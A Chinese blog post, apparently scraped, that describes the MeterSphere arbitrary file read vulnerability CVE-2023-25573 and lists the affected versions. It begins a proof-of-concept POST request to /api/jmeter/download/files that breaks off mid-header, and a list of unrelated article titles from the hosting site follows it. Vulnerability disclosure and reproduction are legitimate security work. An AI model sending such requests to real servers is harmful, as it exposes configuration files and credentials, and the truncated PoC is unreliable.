博客
关于我
MeterSphere files 任意文件读取漏洞复现 (CVE-2023-25573)
阅读量:795 次
发布时间:2023-02-08

本文共 525 字,大约阅读时间需要 1 分钟。

MeterSphere 产品简介

MeterSphere 是一站式开源持续测试平台,整合了测试跟踪、接口测试、UI 测试和性能测试等功能,完美兼容 JMeter、Selenium 等主流开源标准,为开发人员和测试人员提供了全面的测试解决方案。

安全告知:文件读取漏洞

系统中 /api/jmeter/download/files 路径存在文件读取漏洞,攻击者可利用此漏洞读取重要系统文件,如数据库配置文件、系统配置文件等,造成网站安全性严重受损。

影响范围

该漏洞影响 MeterSphere 的以下版本:

  • MeterSphere v2.6.2 及之前版本
  • MeterSphere v1.20.19 LTS 及之前版本

漏洞复现环境

系统运行中存在该漏洞,建议及时修复以保障系统安全。

漏洞复现示例

PoC 提供以下示例:

POST /api/jmeter/download/files HTTP/1.1

Host: your-ip
Content-Type: application/json
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_1

转载地址:http://sryfk.baihongyu.com/

你可能感兴趣的文章
Mdrill 测试数据写入程序
查看>>
MDX Cookbook 12 - 计算 SMA 简单移动平均 LastPeriods() 函数的使用
查看>>
Mean-Shift聚类方法
查看>>
Meanshift,聚类算法
查看>>
media="screen"啥意思?
查看>>
media=screen是什么意思 有什么用?
查看>>
mediawiki
查看>>
MegaCli查看RIAD相关信息
查看>>
MEGER sentence in oracle
查看>>
Meikade开源项目常见问题解决方案
查看>>
Member var and Static var.
查看>>
Membership学习(二)membership入门[xgluxv]
查看>>
Memcache 查看列出所有key方法
查看>>
memcached——分布式内存对象缓存系统
查看>>
memcached分布式部署
查看>>
Memcached对象缓存详解
查看>>
Memcached常用操作
查看>>
memcached的LRU删除机制
查看>>
memcached缓存服务器的安装
查看>>
memcached高速缓存学习笔记001---memcached介绍和安装以及基本使用
查看>>